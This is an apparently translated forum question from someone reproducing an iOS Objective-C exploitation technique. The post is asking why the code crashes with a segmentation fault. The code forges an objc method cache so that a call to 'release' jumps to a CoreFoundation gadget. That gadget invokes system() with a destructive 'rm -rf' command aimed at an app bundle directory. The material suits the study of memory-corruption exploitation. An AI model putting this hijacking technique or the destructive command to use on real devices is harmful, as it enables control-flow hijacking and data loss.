Continuing the reproduction: after compiling it and installing it on iOS, running it produced a Segmentation Fault 11.
After debugging, I confirmed that it happens after the talker object executes the replaced release function.
```objc
int main(void) {
    Talker *talker = [[Talker alloc] init];
    [talker say: @"Hello, Ice and Fire!"];
    [talker say: @"Hello, Ice and Fire!"];
    [talker release];

    fake_cache_bucket.cached_sel = (void*) NSSelectorFromString(@"release");
    NSLog(@"cached_sel = %p", NSSelectorFromString(@"release"));

    uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation");
    NSLog(@"CoreFoundation base address = %p", (void*)CoreFoundation_base);

    // 0x00000000000dcf7c: ldr x1, [x0, #0x98] ; ldr x0, [x0, #0x70] ; cbz x1, #0xdcf9c ; br x1
    fake_cache_bucket.cached_function = (void*)CoreFoundation_base + 0x00000000000dcf7c;
    NSLog(@"fake_cache_bucket.cached_function = %p", (void*)fake_cache_bucket.cached_function);

    fake_receiver.x0 = (uint64_t)&fake_receiver.cmd;
    fake_receiver.x1 = (void *)dlsym(RTLD_DEFAULT, "system");
    NSLog(@"system_address = %p", (void*)fake_receiver.x1);
    strcpy(fake_receiver.cmd, "rm -rf /var/mobile/Containers/Bundle/Application/ED6F728B-CC15-466B-942B-FBC4C534FF95/");

    fake_objc_class.cache_buckets_ptr = &fake_cache_bucket;
    fake_objc_class.cache_bucket_mask = 0;
    fake_receiver.fake_objc_class_ptr = &fake_objc_class;

    talker = &fake_receiver;
    [talker release];
}
```
Later I also built an armv7 version and hit the same problem. I found the following information in the log after the program crashed:
I obtained the value of the pc register. What should the next troubleshooting steps be? What I found online about overflows causing segmentation faults was about disabling ASLR at compile time (which doesn't seem related), but I haven't found a similar answer for iOS.
By rights r0 should hold the object's pointer value, but it doesn't, which seems a bit odd?